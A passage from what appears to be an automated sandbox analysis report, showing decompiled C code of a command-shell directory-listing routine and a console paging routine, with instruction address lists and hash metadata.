											__eflags = _t331 - _t372 >> 1 - 2;
											if(__eflags < 0) {
												L85:
												_t372 =  *_t394;
												_t219 = E00179FD6(_t399,  *_t394, __eflags, _v12,  &_a32);
												_t311 = _t219;
												__eflags = _t311;
												if(_t311 != 0) {
													goto L89;
												}
												__eflags =  *(_t399 + 8) - _t219;
												if( *(_t399 + 8) == _t219) {
													goto L89;
												}
												_t223 = E0015B610(_t311, _t399, _t394);
												_a8 = _t223;
												__eflags = _t223;
												if(_t223 == 0) {
													goto L89;
												}
												__imp__??_V@YAXPAX@Z(_a1152);
												_t195 = _a8;
												goto L5;
											}
											__eflags = _a42 - 0x3a;
											if(__eflags == 0) {
												goto L89;
											}
											goto L85;
											L89:
											_t221 =  *0x19c038(_v16,  &_a32);
											__eflags = _t221;
										} while (_t221 != 0);
										FindClose(_v24);
									}
								}
								goto L91;
							}
							_t325 = _t399;
							_t195 = E0015B610(_t311, _t399, _t394);
							__eflags = _t195;
							if(_t195 != 0) {
								goto L5;
							}
							goto L72;
						}
						__eflags =  *_t394 & 0x00000400;
						if(( *_t394 & 0x00000400) == 0) {
							_t374 =  *0x17d190; // 0x13
							_t375 = _t374 + 0x13;
							__eflags = _t374 + 0x13;
						} else {
							_t315 = _v0;
							__eflags =  *(_t315 + 2);
							if( *(_t315 + 2) != 0) {
								_t389 =  *0x17d190; // 0x13
								_t364 = _t399;
								E00177A11(_t364, _t389 + 0x13);
								_push(_t364);
								E00166740(_t399,  *_t394, _t315 + 0x30 + ( *(_t315 + 2) & 0x0000ffff) * 2);
							}
							_t388 =  *0x17d190; // 0x13
							_t375 = _t388 + 0x20;
						}
						_t337 = _t399;
						E00177A11(_t337, _t375);
						_t372 =  *_t394;
						_t313 = L"...";
						_a8 = _t313;
						__eflags = _t372 & 0x00040000;
						if((_t372 & 0x00040000) == 0) {
							L42:
							_push(_t337);
							_t325 = _t399;
							_a16 = _a4 + 0x2c;
							_t311 = E00166740(_t399, _t372, _a4 + 0x2c);
							_t228 = _v4;
							__eflags =  *_t228 & 0x00000400;
							if(( *_t228 & 0x00000400) == 0) {
								L69:
								_t200 = 0;
								__eflags = 0;
								goto L70;
							}
							__eflags = _t228[9] & 0x20000000;
							if((_t228[9] & 0x20000000) == 0) {
								goto L69;
							}
							_a568 = 1;
							_a572 = 0x104;
							_a564 = 0;
							memset( &_a44, 0, 0x104);
							_t402 = _t402 + 0xc;
							__eflags = _a568;
							_t237 = E00160C70( &_a44, ((0 | _a568 == 0x00000000) - 0x00000001 & 0x00007ee3) + 0x104);
							__eflags = _t237;
							if(_t237 < 0) {
								L67:
								_t372 = L"%s";
								E00166B76(_t399, L"%s", L" [.]");
								L68:
								__imp__??_V@YAXPAX@Z(_a564);
								_pop(_t325);
								goto L69;
							}
							_t341 = _a564;
							__eflags = _a564;
							if(_a564 == 0) {
								_t341 =  &_a44;
							}
							_t240 = E001651C9(_t341, _a572,  *((intOrPtr*)(_a8 + 4)), _a12);
							__eflags = _t240;
							if(_t240 != 0) {
								goto L67;
							} else {
								_t241 = _a564;
								__eflags = _t241;
								if(_t241 == 0) {
									_t241 =  &_a44;
								}
								_t242 = CreateFileW(_t241, 8, 7, 0, 3, 0x2200000, 0);
								_a12 = _t242;
								__eflags = _t242 - 0xffffffff;
								if(_t242 != 0xffffffff) {
									_t243 = DeviceIoControl(_t242, 0x900a8, 0, 0,  &_a1212, 0x4002,  &_a32, 0);
									_t372 = L"%s";
									_t345 = _t399;
									__eflags = _t243;
									if(_t243 != 0) {
										E00166B76(_t345, L"%s", L" [");
										__eflags = _a1208 - 0xa0000003;
										if(_a1208 != 0xa0000003) {
											__eflags = _a1212 - 0xa000000c;
											if(_a1212 != 0xa000000c) {
												_t396 = 6;
												L63:
												_t133 = _t396 + 2; // 0x8
												_t245 = E001600B0(_t133);
												_v4 = _t245;
												__eflags = _t245;
												if(_t245 != 0) {
													memcpy(_t245, _a4, _t396);
													_t402 = _t402 + 0xc;
													__eflags = 0;
													 *((short*)(_v4 + (_t396 >> 1) * 2)) = 0;
													E00166B76(_t399, L"%s", _v4);
													E00160040(_v8);
												}
												_t372 = L"%s";
												E00166B76(_t399, L"%s", "]");
												_t394 = _a16;
												goto L66;
											}
											_t396 = _a1226 & 0x0000ffff;
											_a4 = _t402 + 0x4e4 + ((_a1224 & 0x0000ffff) >> 1) * 2;
											__eflags = _t396;
											if(_t396 != 0) {
												goto L63;
											}
											_t256 = (_a1220 & 0x0000ffff) >> 1;
											__eflags = _t256;
											_t257 = _t402 + 0x4e4 + _t256 * 2;
											L61:
											_t396 = _a1222 & 0x0000ffff;
											_a4 = _t257;
											goto L63;
										}
										_t396 = _a1226 & 0x0000ffff;
										_a4 = _t402 + 0x4e0 + ((_a1224 & 0x0000ffff) >> 1) * 2;
										__eflags = _t396;
										if(_t396 != 0) {
											goto L63;
										}
										_t257 = _t402 + 0x4e0 + ((_a1220 & 0x0000ffff) >> 1) * 2;
										goto L61;
									}
									_push(L" [...]");
									goto L54;
								} else {
									_push(L" [..]");
									_t372 = L"%s";
									_t345 = _t399;
									L54:
									E00166B76(_t345, _t372);
									L66:
									CloseHandle(_a12);
									goto L68;
								}
							}
						} else {
							_a16 = 0x101;
							_a20 = 0;
							_a568 = 0;
							_a28 = 0x10;
							_a572 = 1;
							_a576 = 0x104;
							memset( &_a48, 0, 0x104);
							_t402 = _t402 + 0xc;
							__eflags = _a572;
							_t272 = E00160C70( &_a48, ((0 | _a572 == 0x00000000) - 0x00000001 & 0x00007ee3) + 0x104);
							__eflags = _t272;
							if(_t272 >= 0) {
								_t273 = E001600B0(0x10000);
								_v0 = _t273;
								__eflags = _t273;
								if(_t273 != 0) {
									_t354 = _a568;
									__eflags = _a568;
									if(_a568 == 0) {
										_t354 =  &_a48;
									}
									_t277 = E001651C9(_t354, _a576,  *((intOrPtr*)(_a12 + 4)), _a4 + 0x2c);
									__eflags = _t277;
									if(_t277 != 0) {
										L33:
										E00166B76(_t399, L"%s", _t313);
										goto L36;
									} else {
										_t281 = _a568;
										__eflags = _t281;
										if(_t281 == 0) {
											_t281 =  &_a48;
										}
										_t282 = GetFileSecurityW(_t281, 1, _v0, 0x10000,  &_a40);
										__eflags = _t282;
										if(_t282 == 0) {
											goto L33;
										} else {
											_t285 = GetSecurityDescriptorOwner(_v0,  &_a20,  &_a44);
											__eflags = _t285;
											if(_t285 == 0) {
												goto L33;
											}
											_t286 = E00167797( &_a40);
											__eflags = _t286;
											if(_t286 == 0) {
												L34:
												_push(_t313);
												_t383 = L"%s";
												L35:
												E00166B76(_t399, _t383);
												__eflags = 0;
												_a16 = 0;
												L36:
												E00160040(_v0);
												L37:
												__eflags =  *_t394 & 0x00000400;
												_t381 =  *0x17d190; // 0x13
												if(( *_t394 & 0x00000400) == 0) {
													_t382 = _t381 + 0x2a;
													__eflags = _t381 + 0x2a;
												} else {
													_t382 = _t381 + 0x37;
												}
												E00177A11(_t399, _t382);
												L41:
												__imp__??_V@YAXPAX@Z(_a568);
												_t372 =  *_t394;
												_pop(_t337);
												goto L42;
											}
											 *0x19c034(0, _a20,  &_a648,  &_a16,  &_a1184,  &_a28,  &_a36);
											__eflags = 0;
											if(0 == 0) {
												goto L34;
											}
											_t314 = L"%s";
											E00166B76(_t399, _t314,  &_a1156);
											E00166B76(_t399, _t314, "\\");
											_t383 = _t314;
											_push( &_a612);
											goto L35;
										}
									}
								}
								E00166B76(_t399, L"%s", _t313);
								goto L37;
							}
							E00166B76(_t399, L"%s", _t313);
							goto L41;
						}
					}
					_t306 = E0017AB79(_t399, _t372, _a4);
					L3:
					_t311 = _t306;
					goto L4;
				}
				_t306 = E0016660F(_t399, _t372,  *((intOrPtr*)(_a12 + 4)), _a4);
				goto L3;
			}






































































                                  0x00166555
                                  0x0016655d
                                  0x00166562
                                  0x00166569
                                  0x00166570
                                  0x00166574
                                  0x00166578
                                  0x0016657c
                                  0x0016657f
                                  0x00166585
                                  0x00166589
                                  0x0016658c
                                  0x0016658f
                                  0x00166593
                                  0x00166596
                                  0x00166598
                                  0x0016659a
                                  0x0016659e
                                  0x001665a4
                                  0x0016f9ae
                                  0x0016f9b0
                                  0x00000000
                                  0x00000000
                                  0x0016f9bf
                                  0x0016f9c1
                                  0x0016f9c8
                                  0x0016f9cb
                                  0x0016f9cd
                                  0x0016f9cf
                                  0x001665ca
                                  0x001665d1
                                  0x001665d2
                                  0x001665d3
                                  0x001665de
                                  0x001665de
                                  0x0016f9d5
                                  0x0016f9db
                                  0x0016f9db
                                  0x001665aa
                                  0x001665ad
                                  0x0016f9e2
                                  0x0016f9e5
                                  0x0016f9f8
                                  0x0016f9fe
                                  0x00170030
                                  0x00170034
                                  0x00170037
                                  0x00170044
                                  0x00170039
                                  0x00170039
                                  0x00170039
                                  0x00170053
                                  0x00170055
                                  0x00170057
                                  0x0017005b
                                  0x0017005e
                                  0x00170067
                                  0x00170073
                                  0x00170073
                                  0x00170075
                                  0x00170079
                                  0x001665c8
                                  0x001665c8
                                  0x00000000
                                  0x001665c8
                                  0x00170081
                                  0x00170086
                                  0x00170088
                                  0x00000000
                                  0x00000000
                                  0x00000000
                                  0x0017008e
                                  0x0016fa08
                                  0x0016fa0b
                                  0x0016fa13
                                  0x0016fa15
                                  0x0016fa17
                                  0x0016fa1b
                                  0x0016fa1d
                                  0x0016feac
                                  0x0016feac
                                  0x0016feaf
                                  0x0016fec0
                                  0x0016fec0
                                  0x0016fec6
                                  0x00000000
                                  0x00000000
                                  0x0016fecc
                                  0x0016fed1
                                  0x0016fed3
                                  0x00000000
                                  0x00000000
                                  0x0016fede
                                  0x0016fee8
                                  0x0016fef1
                                  0x0016ff00
                                  0x0016ff0e
                                  0x0016ff11
                                  0x0016ff27
                                  0x0016ff2c
                                  0x0016ff2e
                                  0x0017001d
                                  0x00170024
                                  0x00000000
                                  0x0017002a
                                  0x0016ff34
                                  0x0016ff3b
                                  0x0016ff3d
                                  0x0016ff3f
                                  0x0016ff3f
                                  0x0016ff4a
                                  0x0016ff5c
                                  0x0016ff61
                                  0x0016ff63
                                  0x0016ff69
                                  0x0016ff70
                                  0x0016ff72
                                  0x0016ff74
                                  0x0016ff74
                                  0x0016ff7b
                                  0x0016ff85
                                  0x0016ff8b
                                  0x0016ff8f
                                  0x0016ff92
                                  0x0016ff98
                                  0x0016ff98
                                  0x0016ff9c
                                  0x0016ff9f
                                  0x0016ff9f
                                  0x0016ffa2
                                  0x0016ffa5
                                  0x0016ffa5
                                  0x0016ffb0
                                  0x0016ffb3
                                  0x0016ffbd
                                  0x0016ffbd
                                  0x0016ffca
                                  0x0016ffcf
                                  0x0016ffd1
                                  0x0016ffd3
                                  0x00000000
                                  0x00000000
                                  0x0016ffd5
                                  0x0016ffd8
                                  0x00000000
                                  0x00000000
                                  0x0016ffdc
                                  0x0016ffe1
                                  0x0016ffe5
                                  0x0016ffe7
                                  0x00000000
                                  0x00000000
                                  0x0016fff0
                                  0x0016fff6
                                  0x00000000
                                  0x0016fffa
                                  0x0016ffb5
                                  0x0016ffbb
                                  0x00000000
                                  0x00000000
                                  0x00000000
                                  0x00170000
                                  0x00170009
                                  0x0017000f
                                  0x0017000f
                                  0x00170017
                                  0x00170017
                                  0x0016ff92
                                  0x00000000
                                  0x0016ff63
                                  0x0016feb1
                                  0x0016feb3
                                  0x0016feb8
                                  0x0016feba
                                  0x00000000
                                  0x00000000
                                  0x00000000
                                  0x0016feba
                                  0x0016fa23
                                  0x0016fa29
                                  0x0016fa65
                                  0x0016fa6b
                                  0x0016fa6b
                                  0x0016fa2b
                                  0x0016fa2b
                                  0x0016fa2f
                                  0x0016fa33
                                  0x0016fa35
                                  0x0016fa3b
                                  0x0016fa40
                                  0x0016fa4b
                                  0x0016fa55
                                  0x0016fa55
                                  0x0016fa5a
                                  0x0016fa60
                                  0x0016fa60
                                  0x0016fa6e
                                  0x0016fa70
                                  0x0016fa75
                                  0x0016fa77
                                  0x0016fa7c
                                  0x0016fa80
                                  0x0016fa86
                                  0x0016fc60
                                  0x0016fc67
                                  0x0016fc69
                                  0x0016fc6b
                                  0x0016fc74
                                  0x0016fc76
                                  0x0016fc7a
                                  0x0016fc80
                                  0x0016feaa
                                  0x0016feaa
                                  0x0016feaa
                                  0x00000000
                                  0x0016feaa
                                  0x0016fc86
                                  0x0016fc8d
                                  0x00000000
                                  0x00000000
                                  0x0016fc98
                                  0x0016fca2
                                  0x0016fcab
                                  0x0016fcb7
                                  0x0016fcc2
                                  0x0016fcc5
                                  0x0016fcdb
                                  0x0016fce0
                                  0x0016fce2
                                  0x0016fe8b
                                  0x0016fe90
                                  0x0016fe97
                                  0x0016fe9c
                                  0x0016fea3
                                  0x0016fea9
                                  0x00000000
                                  0x0016fea9
                                  0x0016fce8
                                  0x0016fcef
                                  0x0016fcf1
                                  0x0016fcf3
                                  0x0016fcf3
                                  0x0016fd09
                                  0x0016fd0e
                                  0x0016fd10
                                  0x00000000
                                  0x0016fd16
                                  0x0016fd16
                                  0x0016fd1d
                                  0x0016fd1f
                                  0x0016fd21
                                  0x0016fd21
                                  0x0016fd35
                                  0x0016fd3b
                                  0x0016fd3f
                                  0x0016fd42
                                  0x0016fd6f
                                  0x0016fd75
                                  0x0016fd7a
                                  0x0016fd7c
                                  0x0016fd7e
                                  0x0016fd94
                                  0x0016fd99
                                  0x0016fda4
                                  0x0016fdda
                                  0x0016fde5
                                  0x0016fe29
                                  0x0016fe2a
                                  0x0016fe2a
                                  0x0016fe2d
                                  0x0016fe32
                                  0x0016fe36
                                  0x0016fe38
                                  0x0016fe40
                                  0x0016fe49
                                  0x0016fe4e
                                  0x0016fe56
                                  0x0016fe5c
                                  0x0016fe65
                                  0x0016fe65
                                  0x0016fe6f
                                  0x0016fe76
                                  0x0016fe7b
                                  0x00000000
                                  0x0016fe7b
                                  0x0016fdef
                                  0x0016fe00
                                  0x0016fe04
                                  0x0016fe06
                                  0x00000000
                                  0x00000000
                                  0x0016fe10
                                  0x0016fe10
                                  0x0016fe12
                                  0x0016fe19
                                  0x0016fe19
                                  0x0016fe21
                                  0x00000000
                                  0x0016fe21
                                  0x0016fdae
                                  0x0016fdbf
                                  0x0016fdc3
                                  0x0016fdc5
                                  0x00000000
                                  0x00000000
                                  0x0016fdd1
                                  0x00000000
                                  0x0016fdd1
                                  0x0016fd80
                                  0x00000000
                                  0x0016fd44
                                  0x0016fd44
                                  0x0016fd49
                                  0x0016fd4e
                                  0x0016fd85
                                  0x0016fd85
                                  0x0016fe7f
                                  0x0016fe83
                                  0x00000000
                                  0x0016fe83
                                  0x0016fd42
                                  0x0016fa8c
                                  0x0016fa8e
                                  0x0016fa9b
                                  0x0016faa1
                                  0x0016faad
                                  0x0016fab5
                                  0x0016fabd
                                  0x0016fac4
                                  0x0016facf
                                  0x0016fad2
                                  0x0016fae8
                                  0x0016faed
                                  0x0016faef
                                  0x0016fb08
                                  0x0016fb0d
                                  0x0016fb11
                                  0x0016fb13
                                  0x0016fb27
                                  0x0016fb2e
                                  0x0016fb30
                                  0x0016fb32
                                  0x0016fb32
                                  0x0016fb4c
                                  0x0016fb51
                                  0x0016fb53
                                  0x0016fc08
                                  0x0016fc10
                                  0x00000000
                                  0x0016fb59
                                  0x0016fb59
                                  0x0016fb60
                                  0x0016fb62
                                  0x0016fb64
                                  0x0016fb64
                                  0x0016fb79
                                  0x0016fb7f
                                  0x0016fb81
                                  0x00000000
                                  0x0016fb87
                                  0x0016fb95
                                  0x0016fb9b
                                  0x0016fb9d
                                  0x00000000
                                  0x00000000
                                  0x0016fb9f
                                  0x0016fba4
                                  0x0016fba6
                                  0x0016fc17
                                  0x0016fc17
                                  0x0016fc18
                                  0x0016fc1d
                                  0x0016fc1f
                                  0x0016fc24
                                  0x0016fc26
                                  0x0016fc2a
                                  0x0016fc2e
                                  0x0016fc33
                                  0x0016fc33
                                  0x0016fc39
                                  0x0016fc3f
                                  0x0016fc46
                                  0x0016fc46
                                  0x0016fc41
                                  0x0016fc41
                                  0x0016fc41
                                  0x0016fc4b
                                  0x0016fc50
                                  0x0016fc57
                                  0x0016fc5d
                                  0x0016fc5f
                                  0x00000000
                                  0x0016fc5f
                                  0x0016fbce
                                  0x0016fbd4
                                  0x0016fbd6
                                  0x00000000
                                  0x00000000
                                  0x0016fbdf
                                  0x0016fbe9
                                  0x0016fbf7
                                  0x0016fc03
                                  0x0016fc05
                                  0x00000000
                                  0x0016fc05
                                  0x0016fb81
                                  0x0016fb53
                                  0x0016fb1d
                                  0x00000000
                                  0x0016fb1d
                                  0x0016faf9
                                  0x00000000
                                  0x0016faf9
                                  0x0016fa86
                                  0x0016f9ee
                                  0x001665c6
                                  0x001665c6
                                  0x00000000
                                  0x001665c6
                                  0x001665c1
                                  0x00000000

                                  Strings
                                  Memory Dump Source
                                  • Source File: 0000000E.00000002.500638252.0000000000150000.00000040.00000001.sdmp, Offset: 00150000, based on PE: true
                                  • Associated: 0000000E.00000002.500763101.0000000000199000.00000040.00000001.sdmp Download File
                                  • Associated: 0000000E.00000002.500779380.000000000019D000.00000040.00000001.sdmp Download File
                                  Similarity
                                  • API ID:
                                  • String ID: [...]$ [..]$ [.]$...$:
                                  • API String ID: 0-1980097535
                                  • Opcode ID: c189e0182707917e8bb0b9ba6b2f6c03452bdb94275042562f480be6604181fe
                                  • Instruction ID: 5c5f714da01966b32f996c60c83145bfde7f906785a3d29f25db0dc8ea34cbc6
                                  • Opcode Fuzzy Hash: c189e0182707917e8bb0b9ba6b2f6c03452bdb94275042562f480be6604181fe
                                  • Instruction Fuzzy Hash: 3212DEB12083019BD725DF24DC85AAFB7E5EF98344F00892DF989D7291EB30D865CB52
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 0015C5CA, Relevance: 30.2, APIs: 20, Instructions: 238COMMON
                                  Download Yara Rule
                                  C-Code - Quality: 68%
                                  			E0015C5CA(void* __ecx, long __edx, void* _a4, signed int _a8) {
				signed int _v8;
				short _v16;
				short _v20;
				signed int _v26;
				struct _CONSOLE_SCREEN_BUFFER_INFO _v32;
				signed int _v50;
				struct _CONSOLE_SCREEN_BUFFER_INFO _v56;
				long _v60;
				signed int _v64;
				void* _v68;
				long _v72;
				long _v76;
				long _v80;
				intOrPtr _v84;
				char _v88;
				void* _v108;
				long _v112;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t63;
				void* _t66;
				long _t68;
				long _t71;
				char* _t81;
				long _t85;
				intOrPtr _t88;
				signed int _t91;
				long _t93;
				long _t95;
				signed short _t100;
				struct _COORD _t105;
				void* _t114;
				void* _t115;
				long _t119;
				long _t122;
				signed int _t125;
				long _t128;
				void* _t138;
				void* _t141;
				void* _t143;
				signed int _t150;

				_t63 =  *0x17d0b4; // 0x3dd0c51d
				_v8 = _t63 ^ _t150;
				_v64 = _a8;
				_t141 = __ecx;
				_v76 = __edx;
				_t137 = 0;
				_v72 = 0;
				_t66 = E0016269C(_a8);
				if(_t66 == 0) {
					L13:
					_t114 = 0;
				} else {
					__imp___get_osfhandle(__edx);
					_t114 = _t66;
					if(GetConsoleScreenBufferInfo(_t114,  &_v32) == 0) {
						goto L13;
					} else {
						_t137 = _v16 - _v20 - 1;
						_v72 = _t137;
					}
				}
				_v60 = _v60 & 0x00000000;
				_t119 = E0015C6F4(_t141, _a4, _v64);
				_t133 = 0x18b980;
				_v64 = _t119;
				_t142 = _t119;
				_v68 = 0x18b980;
				if(_t119 == 0) {
					_t68 = _v60;
					goto L11;
				} else {
					do {
						if(_t114 == 0) {
							_t119 = _v76;
							_t85 = E001627C8(_t142 + _t142, _t133, _t142 + _t142,  &_v88);
							__eflags = _t85;
							if(_t85 == 0) {
								L16:
								_t68 = GetLastError();
								_v60 = _t68;
								break;
							} else {
								__eflags = _v88 - _t142 + _t142;
								if(_v88 == _t142 + _t142) {
									goto L9;
								} else {
									goto L16;
								}
							}
						} else {
							if( *0x198065 != 0) {
								_t128 =  *0x19851c;
								__eflags = _t128 - _t137;
								if(_t128 < _t137) {
									L33:
									_t143 = _t133;
									_t88 = _t133 + _v64 * 2;
									_v84 = _t88;
									__eflags = _t133 - _t88;
									if(_t133 < _t88) {
										while(1) {
											__eflags = _t128 - _t137;
											if(_t128 >= _t137) {
												break;
											}
											_t91 =  *_t143 & 0x0000ffff;
											_t143 = _t143 + 2;
											__eflags = _t91 - 0xa;
											if(_t91 == 0xa) {
												_t128 = _t128 + 1;
												__eflags = _t128;
											}
											__eflags = _t143 - _v84;
											if(_t143 < _v84) {
												continue;
											}
											break;
										}
										 *0x19851c = _t128;
									}
									_t142 = _t143 - _t133 >> 1;
									goto L8;
								} else {
									 *0x19851c = 0;
									_t93 = GetConsoleScreenBufferInfo(_t114,  &_v32);
									__eflags = _t93;
									if(_t93 == 0) {
										L32:
										_t128 =  *0x19851c;
										_t133 = _v68;
										goto L33;
									} else {
										_t95 = WriteConsoleW(_t114,  *0x198518,  *0x198514,  &_v60, 0);
										__eflags = _t95;
										if(_t95 == 0) {
											goto L32;
										} else {
											FlushConsoleInputBuffer(GetStdHandle(0xfffffff6));
											GetConsoleMode(_t114,  &_v80);
											_t100 = SetConsoleMode(_t114, 0);
											__imp___getch();
											_t137 = _t100 & 0x0000ffff;
											SetConsoleMode(_t114, _v80);
											GetConsoleScreenBufferInfo(_t114,  &_v56);
											_t133 = _v32.dwSize * _v26;
											_push( &_v60);
											_t105 = _v32.dwCursorPosition;
											_push(_t105);
											_t142 = _v56.dwSize * _v50 - _v32.dwSize * _v26 + _t105 + _v56.dwCursorPosition;
											_push(_v56.dwSize * _v50 - _v32.dwSize * _v26 + _t105 + _v56.dwCursorPosition);
											_push(0x20);
											_push(_t114);
											FillConsoleOutputCharacterW();
											SetConsoleCursorPosition(_t114, _v32.dwCursorPosition);
											__eflags = (_t100 & 0x0000ffff) - 3;
											if((_t100 & 0x0000ffff) == 3) {
												EnterCriticalSection( *0x183858);
												 *0x17d544 = 1;
												LeaveCriticalSection( *0x183858);
												_t68 = 0;
												L12:
												return E00166FD0(_t68, _t114, _v8 ^ _t150, _t133, _t137, _t142);
											} else {
												_t137 = _v72;
												goto L32;
											}
										}
									}
								}
							} else {
								_t142 = 0xa0;
								if(_t119 <= 0xa0) {
									_t142 = _t119;
								}
								L8:
								if(WriteConsoleW(_t114, _t133, _t142,  &_v60, 0) == 0) {
									_t68 = GetLastError();
								} else {
									L9:
									_t68 = 0;
								}
								goto L10;
							}
						}
						goto L55;
						L10:
						_t119 = _v64 - _t142;
						_v60 = _t68;
						_v64 = _t119;
						_t133 = _v68 + _t142 * 2;
						_v68 = _t133;
					} while (_t119 != 0);
					L11:
					if(_t68 != 0) {
						__eflags = _v76 - 2;
						if(__eflags != 0) {
							goto L12;
						} else {
							do {
								__eflags = E00164B60(__eflags, 0);
							} while (__eflags == 0);
							exit(1);
							asm("int3");
							while(1) {
								L44:
								__eflags = _t133 - _t114;
								if(_t133 == _t114) {
									_t119 = _t119 + 2;
								}
								while(1) {
									_t134 = _t114;
									_t71 = E0015D7D4(_t119, _t114);
									_t122 = _t71;
									__eflags = _t122;
									if(_t122 == 0) {
										break;
									}
									_t119 = _t122 + 2;
									_t133 =  *_t119 & 0x0000ffff;
									__eflags = _t133 - 0x31 - 8;
									if(_t133 - 0x31 > 8) {
										goto L44;
									} else {
										_t142 = _t142 + 1;
										continue;
									}
									L24:
									__eflags = _v8 ^ _t150;
									return E00166FD0(_t76, _t115, _v8 ^ _t150, _t134, _t137, _t142);
									goto L55;
								}
								_t115 = _v108;
								__eflags = _t142 - _a4;
								if(_t142 > _a4) {
									_t115 = HeapAlloc(GetProcessHeap(), 0, _t142 << 2);
									__eflags = _t115;
									if(_t115 != 0) {
										_t125 = 0;
										__eflags = _t142;
										if(_t142 != 0) {
											_t138 = _v108;
											_t134 = _a4;
											do {
												__eflags = _t125 - _t134;
												if(_t125 >= _t134) {
													_t81 = " ";
												} else {
													 *_t138 =  *_t138 + 4;
													_t81 =  *( *_t138 - 4);
												}
												 *(_t115 + _t125 * 4) = _t81;
												_t125 = _t125 + 1;
												__eflags = _t125 - _t142;
											} while (_t125 < _t142);
											_t137 = _v112;
										}
										_t142 = FormatMessageW(0x3800, 0, _t137, 0, 0x18b980, 0x2000, _t115);
										RtlFreeHeap(GetProcessHeap(), 0, _t115);
										goto L23;
									}
								} else {
									_push(_t115);
									_push(0x2000);
									_push(0x18b980);
									_push(_t71);
									_push(_t137);
									_push(_t71);
									_push(0x1800);
									_t142 = FormatMessageW();
									L23:
									_t76 = _t142;
								}
								goto L24;
							}
						}
					} else {
						goto L12;
					}
				}
				L55:
			}













































                                  0x0015c5d2
                                  0x0015c5d9
                                  0x0015c5e3
                                  0x0015c5e7
                                  0x0015c5e9
                                  0x0015c5ec
                                  0x0015c5f0
                                  0x0015c5f3
                                  0x0015c5fa
                                  0x0015c6b9
                                  0x0015c6b9
                                  0x0015c600
                                  0x0015c601
                                  0x0015c607
                                  0x0015c617
                                  0x00000000
                                  0x0015c61d
                                  0x0015c627
                                  0x0015c628
                                  0x0015c628
                                  0x0015c617
                                  0x0015c62e
                                  0x0015c63c
                                  0x0015c63e
                                  0x0015c643
                                  0x0015c646
                                  0x0015c648
                                  0x0015c64d
                                  0x0015c6ef
                                  0x00000000
                                  0x0015c653
                                  0x0015c653
                                  0x0015c655
                                  0x0015c6c4
                                  0x0015c6cb
                                  0x0015c6d0
                                  0x0015c6d2
                                  0x0015c6dc
                                  0x0015c6dc
                                  0x0015c6e2
                                  0x00000000
                                  0x0015c6d4
                                  0x0015c6d7
                                  0x0015c6da
                                  0x00000000
                                  0x00000000
                                  0x00000000
                                  0x00000000
                                  0x0015c6da
                                  0x0015c657
                                  0x0015c65e
                                  0x0016ad2a
                                  0x0016ad30
                                  0x0016ad32
                                  0x0016ae01
                                  0x0016ae04
                                  0x0016ae06
                                  0x0016ae09
                                  0x0016ae0c
                                  0x0016ae0e
                                  0x0016ae10
                                  0x0016ae10
                                  0x0016ae12
                                  0x00000000
                                  0x00000000
                                  0x0016ae14
                                  0x0016ae17
                                  0x0016ae1a
                                  0x0016ae1d
                                  0x0016ae1f
                                  0x0016ae1f
                                  0x0016ae1f
                                  0x0016ae20
                                  0x0016ae23
                                  0x00000000
                                  0x00000000
                                  0x00000000
                                  0x0016ae23
                                  0x0016ae25
                                  0x0016ae25
                                  0x0016ae2d
                                  0x00000000
                                  0x0016ad38
                                  0x0016ad3f
                                  0x0016ad45
                                  0x0016ad4b
                                  0x0016ad4d
                                  0x0016adf8
                                  0x0016adf8
                                  0x0016adfe
                                  0x00000000
                                  0x0016ad53
                                  0x0016ad65
                                  0x0016ad6b
                                  0x0016ad6d
                                  0x00000000
                                  0x0016ad73
                                  0x0016ad7c
                                  0x0016ad87
                                  0x0016ad8f
                                  0x0016ad95
                                  0x0016ad9e
                                  0x0016ada2
                                  0x0016adad
                                  0x0016adc2
                                  0x0016adc9
                                  0x0016adca
                                  0x0016add0
                                  0x0016adda
                                  0x0016addc
                                  0x0016addd
                                  0x0016addf
                                  0x0016ade0
                                  0x0016adea
                                  0x0016adf0
                                  0x0016adf3
                                  0x0016ae3a
                                  0x0016ae46
                                  0x0016ae50
                                  0x0016ae56
                                  0x0015c6a6
                                  0x0015c6b6
                                  0x0016adf5
                                  0x0016adf5
                                  0x00000000
                                  0x0016adf5
                                  0x0016adf3
                                  0x0016ad6d
                                  0x0016ad4d
                                  0x0015c664
                                  0x0015c664
                                  0x0015c66f
                                  0x0015c671
                                  0x0015c671
                                  0x0015c673
                                  0x0015c684
                                  0x0015c6e7
                                  0x0015c686
                                  0x0015c686
                                  0x0015c686
                                  0x0015c686
                                  0x00000000
                                  0x0015c684
                                  0x0015c65e
                                  0x00000000
                                  0x0015c688
                                  0x0015c68e
                                  0x0015c690
                                  0x0015c693
                                  0x0015c696
                                  0x0015c699
                                  0x0015c699
                                  0x0015c69e
                                  0x0015c6a0
                                  0x0016ae5d
                                  0x0016ae61
                                  0x00000000
                                  0x0016ae67
                                  0x0016ae67
                                  0x0016ae6e
                                  0x0016ae6e
                                  0x0016ae74
                                  0x0016ae7a
                                  0x0016ae7b
                                  0x0016ae7b
                                  0x0016ae7b
                                  0x0016ae7e
                                  0x0016ae84
                                  0x0016ae84
                                  0x0015c74b
                                  0x0015c74b
                                  0x0015c74d
                                  0x0015c752
                                  0x0015c754
                                  0x0015c756
                                  0x00000000
                                  0x00000000
                                  0x0015c794
                                  0x0015c797
                                  0x0015c79d
                                  0x0015c7a1
                                  0x00000000
                                  0x0015c7a7
                                  0x0015c7a7
                                  0x00000000
                                  0x0015c7a7
                                  0x0015c781
                                  0x0015c786
                                  0x0015c791
                                  0x00000000
                                  0x0015c791
                                  0x0015c758
                                  0x0015c75b
                                  0x0015c75e
                                  0x0016aea1
                                  0x0016aea3
                                  0x0016aea5
                                  0x0016aeab
                                  0x0016aead
                                  0x0016aeaf
                                  0x0016aeb1
                                  0x0016aeb4
                                  0x0016aeb7
                                  0x0016aeb7
                                  0x0016aeb9
                                  0x0016aec5
                                  0x0016aebb
                                  0x0016aebb
                                  0x0016aec0
                                  0x0016aec0
                                  0x0016aeca
                                  0x0016aecd
                                  0x0016aece
                                  0x0016aece
                                  0x0016aed2
                                  0x0016aed2
                                  0x0016aef3
                                  0x0016aefc
                                  0x00000000
                                  0x0016aefc
                                  0x0015c764
                                  0x0015c764
                                  0x0015c765
                                  0x0015c76a
                                  0x0015c76f
                                  0x0015c770
                                  0x0015c771
                                  0x0015c772
                                  0x0015c77d
                                  0x0015c77f
                                  0x0015c77f
                                  0x0015c77f
                                  0x00000000
                                  0x0015c75e
                                  0x0016ae7b
                                  0x00000000
                                  0x00000000
                                  0x00000000
                                  0x0015c6a0
                                  0x00000000

